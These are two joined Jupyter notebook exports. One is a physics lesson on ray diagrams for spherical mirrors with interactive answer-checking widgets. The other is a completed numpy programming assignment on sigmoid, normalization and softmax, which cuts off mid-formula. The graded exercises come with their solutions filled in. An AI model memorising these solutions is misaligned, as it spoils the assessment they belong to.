Image Formation by Spherical MirrorsA simple way to determine the position and characteristics of an image formed by the rays reflected from a spherical mirror is to construct a **ray diagram**. A ray diagram is used to shown the path taken by light rays as they reflect from an object or mirror. This was used to find the image created by a plane mirror in the previous section. When constructing a ray diagram, we need only consider ourselves with finding the location of a single point on the reflected image. To do this, any point on the object may be chosen, but for consistency, we will choose the topmost point for the diagrams shown below. Any rays may be chosen, but there are three particular rays that are easy to draw:* **Ray 1:** This ray is drawn parallel to the principle axis from a point on the object to the surface of the mirror. Since the incident ray is parallel to the principle axis, the reflected ray must pass through the focus. * **Ray 2:** This ray is drawn from a point on the object and through the focus. Since the incident ray passes through the focus, the reflected ray must be parallel to the principle axis. * **Ray 3:** This ray is drawn from a point on the object and through the centre of curvature. This ray is therefore perpendicular to the mirror's surface (incident angle = 0). As such, the reflected ray must return along the same path and pass through the centre of curvature. The point at which any two of these three rays converge can be used to find the location and characteristics of the reflected image. Concave MirrorsThe characteristics of an image formed in a concave mirror depend on the position of the object. There are essentially five cases. Each of these five cases are demonstrated below: Case 1: Object Located at a Distance Greater than $C$ In the first case, the distance of the object from the mirror is greater than the radius used to define the centre of curvature. In other words, the object is further away from the mirror than the centre of curvature. In this example, we can draw any two of the three rays mentioned above to find the image of the reflected object. **Note:** You only need to draw two of the three rays to find the image of the reflected object.
###Code
output_case_1 = widgets.Output()
frame_case_1 = 1
#Toggle images
def show_svg_case_1():
global frame_case_1
if frame_case_1 == 0:
display(SVG("Images/case_1_0.svg"))
frame_case_1 = 1
elif frame_case_1 == 1:
display(SVG("Images/case_1_1.svg"))
frame_case_1 = 2
elif frame_case_1 == 2:
display(SVG("Images/case_1_2.svg"))
frame_case_1 = 3
elif frame_case_1 == 3:
display(SVG("Images/case_1_3.svg"))
frame_case_1 = 0
button_case_1 = widgets.Button(description="Toggle rays", button_style = 'success')
display(button_case_1)
def on_submit_button_case_1_clicked(b):
with output_case_1:
clear_output(wait=True)
show_svg_case_1()
with output_case_1:
display(SVG("Images/case_1_0.svg"))
button_case_1.on_click(on_submit_button_case_1_clicked)
display(output_case_1)
###Output
_____no_output_____
###Markdown
**Question:** *Which options from the dropdown menus best describe the image formed by the reflected rays shown above?*
###Code
#Create dropdown menus
dropdown1_1 = widgets.Dropdown(options={' ':0,'Beyond C': 1, 'At C': 2, 'Between C and F': 3, 'At F': 4, 'Between F and V': 5, 'Beyond V': 6, 'Not applicable (no image)': 7}, value=0, description='Position',)
dropdown1_2 = widgets.Dropdown(options={' ':0,'Larger than the object': 1, 'Same size as the object': 2, 'Smaller than the object': 3, 'Not applicable (no image)': 4}, value=0, description='Relative size',)
dropdown1_3 = widgets.Dropdown(options={' ':0,'Upright': 1, 'Inverted': 2, 'Not applicable (no image)': 3}, value=0, description='Orientation',)
dropdown1_4 = widgets.Dropdown(options={' ':0,'Real': 1, 'Virtual': 2, 'Not applicable (no image)': 3}, value=0, description='Type',)
#Display menus as 2x2 table
container1_1 = widgets.VBox(children=[dropdown1_1,dropdown1_2])
container1_2 = widgets.VBox(children=[dropdown1_3,dropdown1_4])
display(widgets.HBox(children=[container1_1, container1_2])), print(" ", end='\r')
#Evaluate input
def check_answer1(b):
answer1_1 = dropdown1_1.label
answer1_2 = dropdown1_2.label
answer1_3 = dropdown1_3.label
answer1_4 = dropdown1_4.label
if answer1_1 == "Between C and F" and answer1_2 == "Smaller than the object" and answer1_3 == "Inverted" and answer1_4 == "Real":
print("Correct! ", end='\r')
elif answer1_1 != ' ' and answer1_2 != ' ' and answer1_3 != ' ' and answer1_4 != ' ':
print("Try again.", end='\r')
else:
print(" ", end='\r')
dropdown1_1.observe(check_answer1, names='value')
dropdown1_2.observe(check_answer1, names='value')
dropdown1_3.observe(check_answer1, names='value')
dropdown1_4.observe(check_answer1, names='value')
###Output
_____no_output_____
###Markdown
Case 2: Object Located at $C$ In the second case, the distance of the object from the mirror is equal to the radius used to define the centre of curvature.In other words, the object is located at the centre of curvature. In this case, we can draw only two rays to find the image of the reflected object. We cannot draw a ray passing through the centre of curvature because the object is located at $C$.
###Code
output_case_2 = widgets.Output()
frame_case_2 = 1
#Toggle images
def show_svg_case_2():
global frame_case_2
if frame_case_2 == 0:
display(SVG("Images/case_2_0.svg"))
frame_case_2 = 1
elif frame_case_2 == 1:
display(SVG("Images/case_2_1.svg"))
frame_case_2 = 2
elif frame_case_2 == 2:
display(SVG("Images/case_2_2.svg"))
frame_case_2 = 0
button_case_2 = widgets.Button(description="Toggle rays", button_style = 'success')
display(button_case_2)
def on_submit_button_case_2_clicked(b):
with output_case_2:
clear_output(wait=True)
show_svg_case_2()
with output_case_2:
display(SVG("Images/case_2_0.svg"))
button_case_2.on_click(on_submit_button_case_2_clicked)
display(output_case_2)
###Output
_____no_output_____
###Markdown
**Question:** *Which options from the dropdown menus best describe the image formed by the reflected rays shown above?*
###Code
#Create dropdown menus
dropdown2_1 = widgets.Dropdown(options={' ':0,'Beyond C': 1, 'At C': 2, 'Between C and F': 3, 'At F': 4, 'Between F and V': 5, 'Beyond V': 6, 'Not applicable (no image)': 7}, value=0, description='Position',)
dropdown2_2 = widgets.Dropdown(options={' ':0,'Larger than the object': 1, 'Same size as the object': 2, 'Smaller than the object': 3, 'Not applicable (no image)': 4}, value=0, description='Relative size',)
dropdown2_3 = widgets.Dropdown(options={' ':0,'Upright': 1, 'Inverted': 2, 'Not applicable (no image)': 3}, value=0, description='Orientation',)
dropdown2_4 = widgets.Dropdown(options={' ':0,'Real': 1, 'Virtual': 2, 'Not applicable (no image)': 3}, value=0, description='Type',)
#Display menus as 2x2 table
container2_1 = widgets.VBox(children=[dropdown2_1,dropdown2_2])
container2_2 = widgets.VBox(children=[dropdown2_3,dropdown2_4])
display(widgets.HBox(children=[container2_1, container2_2])), print(" ", end='\r')
#Evaluate input
def check_answer2(b):
answer2_1 = dropdown2_1.label
answer2_2 = dropdown2_2.label
answer2_3 = dropdown2_3.label
answer2_4 = dropdown2_4.label
if answer2_1 == "At C" and answer2_2 == "Same size as the object" and answer2_3 == "Inverted" and answer2_4 == "Real":
print("Correct! ", end='\r')
elif answer2_1 != ' ' and answer2_2 != ' ' and answer2_3 != ' ' and answer2_4 != ' ':
print("Try again.", end='\r')
else:
print(" ", end='\r')
dropdown2_1.observe(check_answer2, names='value')
dropdown2_2.observe(check_answer2, names='value')
dropdown2_3.observe(check_answer2, names='value')
dropdown2_4.observe(check_answer2, names='value')
###Output
_____no_output_____
###Markdown
Case 3: Object Located between $C$ and $F$ In the third case, the distance of the object from the mirror is less than the radius used to define the centre of curvature, but greater than the focal length. In other words, the object is located between $F$ and $C$. In this case, we can find the image of the reflected object using two rays as shown below. If the mirror is large enough, a third ray that passes through $C$ can also be drawn.
###Code
output_case_3 = widgets.Output()
frame_case_3 = 1
#Toggle images
def show_svg_case_3():
global frame_case_3
if frame_case_3 == 0:
display(SVG("Images/case_3_0.svg"))
frame_case_3 = 1
elif frame_case_3 == 1:
display(SVG("Images/case_3_1.svg"))
frame_case_3 = 2
elif frame_case_3 == 2:
display(SVG("Images/case_3_2.svg"))
frame_case_3 = 0
button_case_3 = widgets.Button(description="Toggle rays", button_style = 'success')
display(button_case_3)
def on_submit_button_case_3_clicked(b):
with output_case_3:
clear_output(wait=True)
show_svg_case_3()
with output_case_3:
display(SVG("Images/case_3_0.svg"))
button_case_3.on_click(on_submit_button_case_3_clicked)
display(output_case_3)
###Output
_____no_output_____
###Markdown
**Question:** *Which options from the dropdown menus best describe the image formed by the reflected rays shown above?*
###Code
#Create dropdown menus
dropdown3_1 = widgets.Dropdown(options={' ':0,'Beyond C': 1, 'At C': 2, 'Between C and F': 3, 'At F': 4, 'Between F and V': 5, 'Beyond V': 6, 'Not applicable (no image)': 7}, value=0, description='Position',)
dropdown3_2 = widgets.Dropdown(options={' ':0,'Larger than the object': 1, 'Same size as the object': 2, 'Smaller than the object': 3, 'Not applicable (no image)': 4}, value=0, description='Relative size',)
dropdown3_3 = widgets.Dropdown(options={' ':0,'Upright': 1, 'Inverted': 2, 'Not applicable (no image)': 3}, value=0, description='Orientation',)
dropdown3_4 = widgets.Dropdown(options={' ':0,'Real': 1, 'Virtual': 2, 'Not applicable (no image)': 3}, value=0, description='Type',)
#Display menus as 2x2 table
container3_1 = widgets.VBox(children=[dropdown3_1,dropdown3_2])
container3_2 = widgets.VBox(children=[dropdown3_3,dropdown3_4])
display(widgets.HBox(children=[container3_1, container3_2])), print(" ", end='\r')
#Evaluate input
def check_answer3(b):
answer3_1 = dropdown3_1.label
answer3_2 = dropdown3_2.label
answer3_3 = dropdown3_3.label
answer3_4 = dropdown3_4.label
if answer3_1 == "Beyond C" and answer3_2 == "Larger than the object" and answer3_3 == "Inverted" and answer3_4 == "Real":
print("Correct! ", end='\r')
elif answer3_1 != ' ' and answer3_2 != ' ' and answer3_3 != ' ' and answer3_4 != ' ':
print("Try again.", end='\r')
else:
print(" ", end='\r')
dropdown3_1.observe(check_answer3, names='value')
dropdown3_2.observe(check_answer3, names='value')
dropdown3_3.observe(check_answer3, names='value')
dropdown3_4.observe(check_answer3, names='value')
###Output
_____no_output_____
###Markdown
Case 4: Object Located at $F$ In the fourth case, the distance of the object from the mirror is equal to the focal length. In other words, the object is located at the focus. In this case, we can draw only two rays to find the image of the reflected object. We cannot draw a ray passing through the focus because the object is located at $F$. Notice that the reflected rays are parallel and therefore do not intersect. As a consequence, no image is formed.
###Code
output_case_4 = widgets.Output()
frame_case_4 = 1
#Toggle images
def show_svg_case_4():
global frame_case_4
if frame_case_4 == 0:
display(SVG("Images/case_4_0.svg"))
frame_case_4 = 1
elif frame_case_4 == 1:
display(SVG("Images/case_4_1.svg"))
frame_case_4 = 2
elif frame_case_4 == 2:
display(SVG("Images/case_4_2.svg"))
frame_case_4 = 0
button_case_4 = widgets.Button(description="Toggle rays", button_style = 'success')
display(button_case_4)
def on_submit_button_case_4_clicked(b):
with output_case_4:
clear_output(wait=True)
show_svg_case_4()
with output_case_4:
display(SVG("Images/case_4_0.svg"))
button_case_4.on_click(on_submit_button_case_4_clicked)
display(output_case_4)
###Output
_____no_output_____
###Markdown
**Question:** *Which options from the dropdown menus best describe the image formed by the reflected rays shown above?*
###Code
#import ipywidgets as widgets
#Create dropdown menus
dropdown4_1 = widgets.Dropdown(options={' ':0,'Beyond C': 1, 'At C': 2, 'Between C and F': 3, 'At F': 4, 'Between F and V': 5, 'Beyond V': 6, 'Not applicable (no image)': 7}, value=0, description='Position',)
dropdown4_2 = widgets.Dropdown(options={' ':0,'Larger than the object': 1, 'Same size as the object': 2, 'Smaller than the object': 3, 'Not applicable (no image)': 4}, value=0, description='Relative size',)
dropdown4_3 = widgets.Dropdown(options={' ':0,'Upright': 1, 'Inverted': 2, 'Not applicable (no image)': 3}, value=0, description='Orientation',)
dropdown4_4 = widgets.Dropdown(options={' ':0,'Real': 1, 'Virtual': 2, 'Not applicable (no image)': 3}, value=0, description='Type',)
#Display menus as 2x2 table
container4_1 = widgets.VBox(children=[dropdown4_1,dropdown4_2])
container4_2 = widgets.VBox(children=[dropdown4_3,dropdown4_4])
display(widgets.HBox(children=[container4_1, container4_2])), print(" ", end='\r')
#Evaluate input
def check_answer4(b):
answer4_1 = dropdown4_1.label
answer4_2 = dropdown4_2.label
answer4_3 = dropdown4_3.label
answer4_4 = dropdown4_4.label
if answer4_1 == "Not applicable (no image)" and answer4_2 == "Not applicable (no image)" and answer4_3 == "Not applicable (no image)" and answer4_4 == "Not applicable (no image)":
print("Correct! ", end='\r')
elif answer4_1 != ' ' and answer4_2 != ' ' and answer4_3 != ' ' and answer4_4 != ' ':
print("Try again.", end='\r')
else:
print(" ", end='\r')
dropdown4_1.observe(check_answer4, names='value')
dropdown4_2.observe(check_answer4, names='value')
dropdown4_3.observe(check_answer4, names='value')
dropdown4_4.observe(check_answer4, names='value')
###Output
_____no_output_____
###Markdown
Case 5: Object Located between $F$ and $V$ In the fifth case, the distance of the object from the mirror is less than the focal length. In other words, the object is located between $F$ and $V$. In this case, we can find the image of the reflected object using two rays as shown below. Notice that the reflected rays do not actually converge. However, the projections of the reflected rays *do* converge behind the mirror. Therefore, a virtual image is formed.
###Code
output_case_5 = widgets.Output()
frame_case_5 = 1
#Toggle images
def show_svg_case_5():
global frame_case_5
if frame_case_5 == 0:
display(SVG("Images/case_5_0.svg"))
frame_case_5 = 1
elif frame_case_5 == 1:
display(SVG("Images/case_5_1.svg"))
frame_case_5 = 2
elif frame_case_5 == 2:
display(SVG("Images/case_5_2.svg"))
frame_case_5 = 0
button_case_5 = widgets.Button(description="Toggle rays", button_style = 'success')
display(button_case_5)
def on_submit_button_case_5_clicked(b):
with output_case_5:
clear_output(wait=True)
show_svg_case_5()
with output_case_5:
display(SVG("Images/case_5_0.svg"))
button_case_5.on_click(on_submit_button_case_5_clicked)
display(output_case_5)
###Output
_____no_output_____
###Markdown
**Question:** *Which options from the dropdown menus best describe the image formed by the reflected rays shown above?*
###Code
#Create dropdown menus
dropdown5_1 = widgets.Dropdown(options={' ':0,'Beyond C': 1, 'At C': 2, 'Between C and F': 3, 'At F': 4, 'Between F and V': 5, 'Beyond V': 6, 'Not applicable (no image)': 7}, value=0, description='Position',)
dropdown5_2 = widgets.Dropdown(options={' ':0,'Larger than the object': 1, 'Same size as the object': 2, 'Smaller than the object': 3, 'Not applicable (no image)': 4}, value=0, description='Relative size',)
dropdown5_3 = widgets.Dropdown(options={' ':0,'Upright': 1, 'Inverted': 2, 'Not applicable (no image)': 3}, value=0, description='Orientation',)
dropdown5_4 = widgets.Dropdown(options={' ':0,'Real': 1, 'Virtual': 2, 'Not applicable (no image)': 3}, value=0, description='Type',)
#Display menus as 2x2 table
container5_1 = widgets.VBox(children=[dropdown5_1,dropdown5_2])
container5_2 = widgets.VBox(children=[dropdown5_3,dropdown5_4])
display(widgets.HBox(children=[container5_1, container5_2])), print(" ", end='\r')
#Evaluate input
def check_answer5(b):
answer5_1 = dropdown5_1.label
answer5_2 = dropdown5_2.label
answer5_3 = dropdown5_3.label
answer5_4 = dropdown5_4.label
if answer5_1 == "Beyond V" and answer5_2 == "Larger than the object" and answer5_3 == "Upright" and answer5_4 == "Virtual":
print("Correct! ", end='\r')
elif answer5_1 != ' ' and answer5_2 != ' ' and answer5_3 != ' ' and answer5_4 != ' ':
print("Try again.", end='\r')
else:
print(" ", end='\r')
dropdown5_1.observe(check_answer5, names='value')
dropdown5_2.observe(check_answer5, names='value')
dropdown5_3.observe(check_answer5, names='value')
dropdown5_4.observe(check_answer5, names='value')
###Output
_____no_output_____
###Markdown
Convex MirrorsFor reflections in convex mirrors, the location of the object does not change the general characteristics of the image. The image will always be between F and V, smaller than the object, upright, and virtual.
###Code
output_convex = widgets.Output()
frame_convex = 1
#Toggle images
def show_svg_convex():
global frame_convex
if frame_convex == 0:
display(SVG("Images/convex_mirror_reflection_0.svg"))
frame_convex = 1
elif frame_convex == 1:
display(SVG("Images/convex_mirror_reflection_1.svg"))
frame_convex = 2
elif frame_convex == 2:
display(SVG("Images/convex_mirror_reflection_2.svg"))
frame_convex = 0
button_convex = widgets.Button(description="Toggle rays", button_style = 'success')
display(button_convex)
def on_submit_button_convex_clicked(b):
with output_convex:
clear_output(wait=True)
show_svg_convex()
with output_convex:
display(SVG("Images/convex_mirror_reflection_0.svg"))
button_convex.on_click(on_submit_button_convex_clicked)
display(output_convex)
###Output
_____no_output_____
###Markdown
**Question:** *Which options from the dropdown menus best describe the image formed by the reflected rays shown above?*
###Code
#Create dropdown menus
dropdown6_1 = widgets.Dropdown(options={' ':0,'Beyond C': 1, 'At C': 2, 'Between C and F': 3, 'At F': 4, 'Between F and V': 5, 'Beyond V': 6, 'Not applicable (no image)': 7}, value=0, description='Position',)
dropdown6_2 = widgets.Dropdown(options={' ':0,'Larger than the object': 1, 'Same size as the object': 2, 'Smaller than the object': 3, 'Not applicable (no image)': 4}, value=0, description='Relative size',)
dropdown6_3 = widgets.Dropdown(options={' ':0,'Upright': 1, 'Inverted': 2, 'Not applicable (no image)': 3}, value=0, description='Orientation',)
dropdown6_4 = widgets.Dropdown(options={' ':0,'Real': 1, 'Virtual': 2, 'Not applicable (no image)': 3}, value=0, description='Type',)
#Display menus as 2x2 table
container6_1 = widgets.VBox(children=[dropdown6_1,dropdown6_2])
container6_2 = widgets.VBox(children=[dropdown6_3,dropdown6_4])
display(widgets.HBox(children=[container6_1, container6_2])), print(" ", end='\r')
#Evaluate input
def check_answer6(b):
answer6_1 = dropdown6_1.label
answer6_2 = dropdown6_2.label
answer6_3 = dropdown6_3.label
answer6_4 = dropdown6_4.label
if answer6_1 == "Between F and V" and answer6_2 == "Smaller than the object" and answer6_3 == "Upright" and answer6_4 == "Virtual":
print("Correct! ", end='\r')
elif answer6_1 != ' ' and answer6_2 != ' ' and answer6_3 != ' ' and answer6_4 != ' ':
print("Try again.", end='\r')
else:
print(" ", end='\r')
dropdown6_1.observe(check_answer6, names='value')
dropdown6_2.observe(check_answer6, names='value')
dropdown6_3.observe(check_answer6, names='value')
dropdown6_4.observe(check_answer6, names='value')
###Output
_____no_output_____ |
MOOCS/Deeplearing_Specialization/Notebooks/Python Basics With Numpy v3.ipynb | ###Markdown
Python Basics with Numpy (optional assignment)Welcome to your first assignment. This exercise gives you a brief introduction to Python. Even if you've used Python before, this will help familiarize you with functions we'll need. **Instructions:**- You will be using Python 3.- Avoid using for-loops and while-loops, unless you are explicitly told to do so.- Do not modify the ( GRADED FUNCTION [function name]) comment in some cells. Your work would not be graded if you change this. Each cell containing that comment should only contain one function.- After coding your function, run the cell right below it to check if your result is correct.**After this assignment you will:**- Be able to use iPython Notebooks- Be able to use numpy functions and numpy matrix/vector operations- Understand the concept of "broadcasting"- Be able to vectorize codeLet's get started! About iPython Notebooks iPython Notebooks are interactive coding environments embedded in a webpage. You will be using iPython notebooks in this class. You only need to write code between the START CODE HERE and END CODE HERE comments. After writing your code, you can run the cell by either pressing "SHIFT"+"ENTER" or by clicking on "Run Cell" (denoted by a play symbol) in the upper bar of the notebook. We will often specify "(≈ X lines of code)" in the comments to tell you about how much code you need to write. It is just a rough estimate, so don't feel bad if your code is longer or shorter.**Exercise**: Set test to `"Hello World"` in the cell below to print "Hello World" and run the two cells below.
###Code
### START CODE HERE ### (≈ 1 line of code)
test = 'Hello World'
### END CODE HERE ###
print ("test: " + test)
###Output
test: Hello World
###Markdown
**Expected output**:test: Hello World **What you need to remember**:- Run your cells using SHIFT+ENTER (or "Run cell")- Write code in the designated areas using Python 3 only- Do not modify the code outside of the designated areas 1 - Building basic functions with numpy Numpy is the main package for scientific computing in Python. It is maintained by a large community (www.numpy.org). In this exercise you will learn several key numpy functions such as np.exp, np.log, and np.reshape. You will need to know how to use these functions for future assignments. 1.1 - sigmoid function, np.exp() Before using np.exp(), you will use math.exp() to implement the sigmoid function. You will then see why np.exp() is preferable to math.exp().**Exercise**: Build a function that returns the sigmoid of a real number x. Use math.exp(x) for the exponential function.**Reminder**:$sigmoid(x) = \frac{1}{1+e^{-x}}$ is sometimes also known as the logistic function. It is a non-linear function used not only in Machine Learning (Logistic Regression), but also in Deep Learning.To refer to a function belonging to a specific package you could call it using package_name.function(). Run the code below to see an example with math.exp().
###Code
# GRADED FUNCTION: basic_sigmoid
import math
def basic_sigmoid(x):
"""
Compute sigmoid of x.
Arguments:
x -- A scalar
Return:
s -- sigmoid(x)
"""
### START CODE HERE ### (≈ 1 line of code)
s = 1 / (1 + math.exp(-x))
### END CODE HERE ###
return s
basic_sigmoid(3)
###Output
_____no_output_____
###Markdown
**Expected Output**: ** basic_sigmoid(3) ** 0.9525741268224334 Actually, we rarely use the "math" library in deep learning because the inputs of the functions are real numbers. In deep learning we mostly use matrices and vectors. This is why numpy is more useful.
###Code
### One reason why we use "numpy" instead of "math" in Deep Learning ###
x = [1, 2, 3]
#basic_sigmoid(x) # you will see this give an error when you run it, because x is a vector.
###Output
_____no_output_____
###Markdown
In fact, if $ x = (x_1, x_2, ..., x_n)$ is a row vector then $np.exp(x)$ will apply the exponential function to every element of x. The output will thus be: $np.exp(x) = (e^{x_1}, e^{x_2}, ..., e^{x_n})$
###Code
import numpy as np
# example of np.exp
x = np.array([1, 2, 3])
print(np.exp(x)) # result is (exp(1), exp(2), exp(3))
###Output
[ 2.71828183 7.3890561 20.08553692]
###Markdown
Furthermore, if x is a vector, then a Python operation such as $s = x + 3$ or $s = \frac{1}{x}$ will output s as a vector of the same size as x.
###Code
# example of vector operation
x = np.array([1, 2, 3])
print (x + 3)
###Output
[4 5 6]
###Markdown
Any time you need more info on a numpy function, we encourage you to look at [the official documentation](https://docs.scipy.org/doc/numpy-1.10.1/reference/generated/numpy.exp.html). You can also create a new cell in the notebook and write `np.exp?` (for example) to get quick access to the documentation.**Exercise**: Implement the sigmoid function using numpy. **Instructions**: x could now be either a real number, a vector, or a matrix. The data structures we use in numpy to represent these shapes (vectors, matrices...) are called numpy arrays. You don't need to know more for now.$$ \text{For } x \in \mathbb{R}^n \text{, } sigmoid(x) = sigmoid\begin{pmatrix} x_1 \\ x_2 \\ ... \\ x_n \\\end{pmatrix} = \begin{pmatrix} \frac{1}{1+e^{-x_1}} \\ \frac{1}{1+e^{-x_2}} \\ ... \\ \frac{1}{1+e^{-x_n}} \\\end{pmatrix}\tag{1} $$
###Code
# GRADED FUNCTION: sigmoid
import numpy as np # this means you can access numpy functions by writing np.function() instead of numpy.function()
def sigmoid(x):
"""
Compute the sigmoid of x
Arguments:
x -- A scalar or numpy array of any size
Return:
s -- sigmoid(x)
"""
### START CODE HERE ### (≈ 1 line of code)
s = 1 / (1 + np.exp(-x))
### END CODE HERE ###
return s
x = np.array([1, 2, 3])
sigmoid(x)
###Output
_____no_output_____
###Markdown
**Expected Output**: **sigmoid([1,2,3])** array([ 0.73105858, 0.88079708, 0.95257413]) 1.2 - Sigmoid gradientAs you've seen in lecture, you will need to compute gradients to optimize loss functions using backpropagation. Let's code your first gradient function.**Exercise**: Implement the function sigmoid_grad() to compute the gradient of the sigmoid function with respect to its input x. The formula is: $$sigmoid\_derivative(x) = \sigma'(x) = \sigma(x) (1 - \sigma(x))\tag{2}$$You often code this function in two steps:1. Set s to be the sigmoid of x. You might find your sigmoid(x) function useful.2. Compute $\sigma'(x) = s(1-s)$
###Code
# GRADED FUNCTION: sigmoid_derivative
def sigmoid_derivative(x):
"""
Compute the gradient (also called the slope or derivative) of the sigmoid function with respect to its input x.
You can store the output of the sigmoid function into variables and then use it to calculate the gradient.
Arguments:
x -- A scalar or numpy array
Return:
ds -- Your computed gradient.
"""
### START CODE HERE ### (≈ 2 lines of code)
s = sigmoid(x)
ds = s * (1 - s)
### END CODE HERE ###
return ds
x = np.array([1, 2, 3])
print ("sigmoid_derivative(x) = " + str(sigmoid_derivative(x)))
###Output
sigmoid_derivative(x) = [0.19661193 0.10499359 0.04517666]
###Markdown
**Expected Output**: **sigmoid_derivative([1,2,3])** [ 0.19661193 0.10499359 0.04517666] 1.3 - Reshaping arrays Two common numpy functions used in deep learning are [np.shape](https://docs.scipy.org/doc/numpy/reference/generated/numpy.ndarray.shape.html) and [np.reshape()](https://docs.scipy.org/doc/numpy/reference/generated/numpy.reshape.html). - X.shape is used to get the shape (dimension) of a matrix/vector X. - X.reshape(...) is used to reshape X into some other dimension. For example, in computer science, an image is represented by a 3D array of shape $(length, height, depth = 3)$. However, when you read an image as the input of an algorithm you convert it to a vector of shape $(length*height*3, 1)$. In other words, you "unroll", or reshape, the 3D array into a 1D vector.**Exercise**: Implement `image2vector()` that takes an input of shape (length, height, 3) and returns a vector of shape (length\*height\*3, 1). For example, if you would like to reshape an array v of shape (a, b, c) into a vector of shape (a*b,c) you would do:``` pythonv = v.reshape((v.shape[0]*v.shape[1], v.shape[2])) v.shape[0] = a ; v.shape[1] = b ; v.shape[2] = c```- Please don't hardcode the dimensions of image as a constant. Instead look up the quantities you need with `image.shape[0]`, etc.
###Code
# GRADED FUNCTION: image2vector
def image2vector(image):
"""
Argument:
image -- a numpy array of shape (length, height, depth)
Returns:
v -- a vector of shape (length*height*depth, 1)
"""
### START CODE HERE ### (≈ 1 line of code)
(length, height, depth) = image.shape[0], image.shape[1], image.shape[2]
tot_size = length * height * depth
v = image.reshape((tot_size, 1))
### END CODE HERE ###
return v
# This is a 3 by 3 by 2 array, typically images will be (num_px_x, num_px_y,3) where 3 represents the RGB values
image = np.array([[[ 0.67826139, 0.29380381],
[ 0.90714982, 0.52835647],
[ 0.4215251 , 0.45017551]],
[[ 0.92814219, 0.96677647],
[ 0.85304703, 0.52351845],
[ 0.19981397, 0.27417313]],
[[ 0.60659855, 0.00533165],
[ 0.10820313, 0.49978937],
[ 0.34144279, 0.94630077]]])
print ("image2vector(image) = " + str(image2vector(image)))
###Output
image2vector(image) = [[0.67826139]
[0.29380381]
[0.90714982]
[0.52835647]
[0.4215251 ]
[0.45017551]
[0.92814219]
[0.96677647]
[0.85304703]
[0.52351845]
[0.19981397]
[0.27417313]
[0.60659855]
[0.00533165]
[0.10820313]
[0.49978937]
[0.34144279]
[0.94630077]]
###Markdown
**Expected Output**: **image2vector(image)** [[ 0.67826139] [ 0.29380381] [ 0.90714982] [ 0.52835647] [ 0.4215251 ] [ 0.45017551] [ 0.92814219] [ 0.96677647] [ 0.85304703] [ 0.52351845] [ 0.19981397] [ 0.27417313] [ 0.60659855] [ 0.00533165] [ 0.10820313] [ 0.49978937] [ 0.34144279] [ 0.94630077]] 1.4 - Normalizing rowsAnother common technique we use in Machine Learning and Deep Learning is to normalize our data. It often leads to a better performance because gradient descent converges faster after normalization. Here, by normalization we mean changing x to $ \frac{x}{\| x\|} $ (dividing each row vector of x by its norm).For example, if $$x = \begin{bmatrix} 0 & 3 & 4 \\ 2 & 6 & 4 \\\end{bmatrix}\tag{3}$$ then $$\| x\| = np.linalg.norm(x, axis = 1, keepdims = True) = \begin{bmatrix} 5 \\ \sqrt{56} \\\end{bmatrix}\tag{4} $$and $$ x\_normalized = \frac{x}{\| x\|} = \begin{bmatrix} 0 & \frac{3}{5} & \frac{4}{5} \\ \frac{2}{\sqrt{56}} & \frac{6}{\sqrt{56}} & \frac{4}{\sqrt{56}} \\\end{bmatrix}\tag{5}$$ Note that you can divide matrices of different sizes and it works fine: this is called broadcasting and you're going to learn about it in part 5.**Exercise**: Implement normalizeRows() to normalize the rows of a matrix. After applying this function to an input matrix x, each row of x should be a vector of unit length (meaning length 1).
###Code
# GRADED FUNCTION: normalizeRows
def normalizeRows(x):
"""
Implement a function that normalizes each row of the matrix x (to have unit length).
Argument:
x -- A numpy matrix of shape (n, m)
Returns:
x -- The normalized (by row) numpy matrix. You are allowed to modify x.
"""
### START CODE HERE ### (≈ 2 lines of code)
# Compute x_norm as the norm 2 of x. Use np.linalg.norm(..., ord = 2, axis = ..., keepdims = True)
x_norm = np.linalg.norm(x, ord = 2, axis = 1, keepdims = True)
# Divide x by its norm.
x = x / x_norm
### END CODE HERE ###
return x
x = np.array([
[0, 3, 4],
[1, 6, 4]])
print("normalizeRows(x) = " + str(normalizeRows(x)))
###Output
normalizeRows(x) = [[0. 0.6 0.8 ]
[0.13736056 0.82416338 0.54944226]]
###Markdown
**Expected Output**: **normalizeRows(x)** [[ 0. 0.6 0.8 ] [ 0.13736056 0.82416338 0.54944226]] **Note**:In normalizeRows(), you can try to print the shapes of x_norm and x, and then rerun the assessment. You'll find out that they have different shapes. This is normal given that x_norm takes the norm of each row of x. So x_norm has the same number of rows but only 1 column. So how did it work when you divided x by x_norm? This is called broadcasting and we'll talk about it now! 1.5 - Broadcasting and the softmax function A very important concept to understand in numpy is "broadcasting". It is very useful for performing mathematical operations between arrays of different shapes. For the full details on broadcasting, you can read the official [broadcasting documentation](http://docs.scipy.org/doc/numpy/user/basics.broadcasting.html). **Exercise**: Implement a softmax function using numpy. You can think of softmax as a normalizing function used when your algorithm needs to classify two or more classes. You will learn more about softmax in the second course of this specialization.**Instructions**:- $ \text{for } x \in \mathbb{R}^{1\times n} \text{, } softmax(x) = softmax(\begin{bmatrix} x_1 && x_2 && ... && x_n \end{bmatrix}) = \begin{bmatrix} \frac{e^{x_1}}{\sum_{j}e^{x_j}} && \frac{e^{x_2}}{\sum_{j}e^{x_j}} && ... && \frac{e^{x_n}}{\sum_{j}e^{x_j}} \end{bmatrix} $ - $\text{for a matrix } x \in \mathbb{R}^{m \times n} \text{, $x_{ij}$ maps to the element in the $i^{th}$ row and $j^{th}$ column of $x$, thus we have: }$ $$softmax(x) = softmax\begin{bmatrix} x_{11} & x_{12} & x_{13} & \dots & x_{1n} \\ x_{21} & x_{22} & x_{23} & \dots & x_{2n} \\ \vdots & \vdots & \vdots & \ddots & \vdots \\ x_{m1} & x_{m2} & x_{m3} & \dots & x_{mn}\end{bmatrix} = \begin{bmatrix} \frac{e^{x_{11}}}{\sum_{j}e^{x_{1j}}} & \frac{e^{x_{12}}}{\sum_{j}e^{x_{1j}}} & \frac{e^{x_{13}}}{\sum_{j}e^{x_{1j}}} & \dots & \frac{e^{x_{1n}}}{\sum_{j}e^{x_{1j}}} \\ \frac{e^{x_{21}}}{\sum_{j}e^{x_{2j}}} & \frac{e^{x_{22}}}{\sum_{j}e^{x_{2j}}} & \frac{e^{x_{23}}}{\sum_{j}e^{x_{2j}}} & \dots & \frac{e^{x_{2n}}}{\sum_{j}e^{x_{2j}}} \\ \vdots & \vdots & \vdots & \ddots & \vdots \\ \frac{e^{x_{m1}}}{\sum_{j}e^{x_{mj}}} & \frac{e^{x_{m2}}}{\sum_{j}e^{x_{mj}}} & \frac{e^{x_{m3}}}{\sum_{j}e^{x_{mj}}} & \dots & \frac{e^{x_{mn}}}{\sum_{j}e^{x_{mj}}}\end{bmatrix} = \begin{pmatrix} 